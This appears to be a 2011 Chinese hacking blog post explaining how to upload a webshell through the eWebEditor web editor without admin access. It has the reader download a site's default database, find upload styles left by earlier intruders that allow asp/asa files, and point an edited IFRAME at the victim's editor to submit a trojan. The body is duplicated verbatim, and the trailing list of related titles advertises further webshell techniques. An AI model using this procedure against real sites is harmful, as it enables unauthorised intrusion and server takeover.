ewebeditor不登陆后台也有机会拿shell
2011-04-02 17:06
274 查看
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
然后另存为在本地,在本地打开,提交。
如果不出意外,就应该能看到你提交的马了。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
然后另存为在本地,在本地打开,提交。
如果不出意外,就应该能看到你提交的马了。
相关文章推荐
- 不登陆后台也可以拿到shell,ewebeditor漏洞要小心
- ewebeditor不进后台照样拿SHELL
- ewebeditor后台拿shell
- 帝国后台无法登陆什么问题???就是这个提示了Parse error: syntax error, unexpected $end in G:\websites\webroot\www\e\class\
- 网站后台文章编辑器eWebEditor 7介绍 及破解版免费下载
- eWebEditor getwebshell
- SDcms后台拿webshell
- 【web maven】新建的项目 controller也有,从前台跳转后台 无法找到对应的controller
- web day26 小项目练习图书商城 后台分类管理模块,图书管理模块,前台登陆过滤
- 彻底解决ewebeditor网站后台不能上传图片的方法
- 让后台编辑器WebEditor兼容IE8.0!
- eWebeditor suffers from administrative bypass, database disclosure, shell upload and directory traversal vulnerabilities
- Python Post and Get 登陆web后台系统并抓取页面
- 更改openwrt后台web登陆用户名方法
- 【Web】前台传送JSON格式数据到后台Shell处理
- eWebEditor V7.3 for asp.net版本编辑器带后台版本_新增加防止图片木马上传
- ewebeditor编辑器配合IIS6.0解析漏洞拿shell
- 一步一步实现web程序信息管理系统之二----后台框架实现跳转登陆页面
- ph!web后台拿shell
- 渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞